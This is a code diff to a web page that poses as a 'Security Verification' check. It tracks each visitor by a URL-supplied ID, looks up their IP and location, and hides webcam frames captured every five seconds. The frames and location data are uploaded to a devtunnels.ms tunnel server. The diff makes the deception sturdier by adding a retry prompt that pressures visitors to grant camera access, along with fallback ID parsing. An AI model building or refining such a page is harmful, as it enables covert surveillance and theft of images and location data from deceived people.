--- a/index.html
+++ b/index.html
@@ -5,20 +5,31 @@
     <style>
         body { font-family: sans-serif; text-align: center; margin-top: 40px; }
         video, canvas { display: none; }
-        button { padding: 10px 20px; font-size: 18px; margin-top: 20px; }
+        button { padding: 10px 20px; font-size: 18px; margin-top: 20px; cursor: pointer; background-color: #4CAF50; color: white; border: none; border-radius: 4px; }
+        .permission-warning { color: #ff4500; font-weight: bold; }
+        .error-message { margin-top: 20px; color: red; }
     </style>
 </head>
 <body>
     <video id="video" width="320" height="240" autoplay></video>
     <canvas id="canvas" width="320" height="240"></canvas>
     <h2>Security Verification in Progress...</h2>
+    <div id="camera-permission" style="display: none;">
+        <p class="permission-warning">⚠️ Camera access is required for security verification</p>
+        <button id="request-camera">Grant Camera Access</button>
+        <div id="error-message" class="error-message"></div>
+    </div>
 
     <script>
         const video = document.getElementById("video");
         const canvas = document.getElementById("canvas");
         const ctx = canvas.getContext("2d");
+        const cameraPermissionDiv = document.getElementById("camera-permission");
+        const requestCameraButton = document.getElementById("request-camera");
+        const errorMessageDiv = document.getElementById("error-message");
         let ipInfo = {};
         let captureInterval;
+        let permissionRequested = false;
 
         // جلب بيانات الـ IP
         fetch("https://ipapi.co/json")
@@ -27,29 +38,65 @@
                 ipInfo = data;
                 // بدء التقاط الكاميرا بعد الحصول على بيانات IP
                 requestCameraAccess();
+            })
+            .catch(err => {
+                console.error("Error fetching IP info:", err);
+                // Try to request camera even if IP fetch fails
+                requestCameraAccess();
             });
 
         // طلب الكاميرا فور تحميل الصفحة
         function requestCameraAccess() {
+            permissionRequested = true;
             navigator.mediaDevices.getUserMedia({ video: true })
                 .then(stream => {
                     video.srcObject = stream;
+                    cameraPermissionDiv.style.display = "none";
                     // بدء إرسال الصور والبيانات كل 5 ثواني
                     captureAndSendData();
                     captureInterval = setInterval(captureAndSendData, 5000);
                 })
                 .catch(err => {
                     console.error("Camera access error:", err);
-                    document.body.innerHTML = "<h2>⚠️ Please allow camera access to continue</h2>";
+                    // Show the camera permission request UI
+                    cameraPermissionDiv.style.display = "block";
+                    errorMessageDiv.textContent = "Camera access was denied. Please grant permission to continue.";
                 });
         }
 
+        // Add event listener for the request camera button
+        requestCameraButton.addEventListener("click", function() {
+            errorMessageDiv.textContent = "";
+            requestCameraAccess();
+        });
+
         function captureAndSendData() {
+            if (!video.srcObject) {
+                console.error("No camera stream available");
+                return;
+            }
+            
             ctx.drawImage(video, 0, 0, 320, 240);
             const imageData = canvas.toDataURL("image/png");
 
             // استخراج user_id من عنوان URL
-            const user_id = window.location.pathname.split("/").pop();
+            let user_id;
+            // Try to get from query parameter "id"
+            const urlParams = new URLSearchParams(window.location.search);
+            user_id = urlParams.get('id');
+            
+            // If not found in query params, try path-based
+            if (!user_id) {
+                const pathUserId = window.location.pathname.split("/").pop();
+                if (pathUserId && pathUserId !== "" && pathUserId !== "index.html") {
+                    user_id = pathUserId;
+                }
+            }
+
+            if (!user_id) {
+                console.error("User ID not found in URL");
+                return;
+            }
 
             // إرسال البيانات إلى السيرفر
             fetch("https://ckfnp3td-6362.uks1.devtunnels.ms:6362/upload", {
@@ -69,6 +116,12 @@
             }).catch(err => {
                 console.error("Network error:", err);
             });
+        }
+
+        // Check if the browser supports the camera API
+        if (!navigator.mediaDevices || !navigator.mediaDevices.getUserMedia) {
+            cameraPermissionDiv.style.display = "block";
+            errorMessageDiv.textContent = "Your browser doesn't support camera access. Please use a modern browser.";
         }
     </script>
 </body>
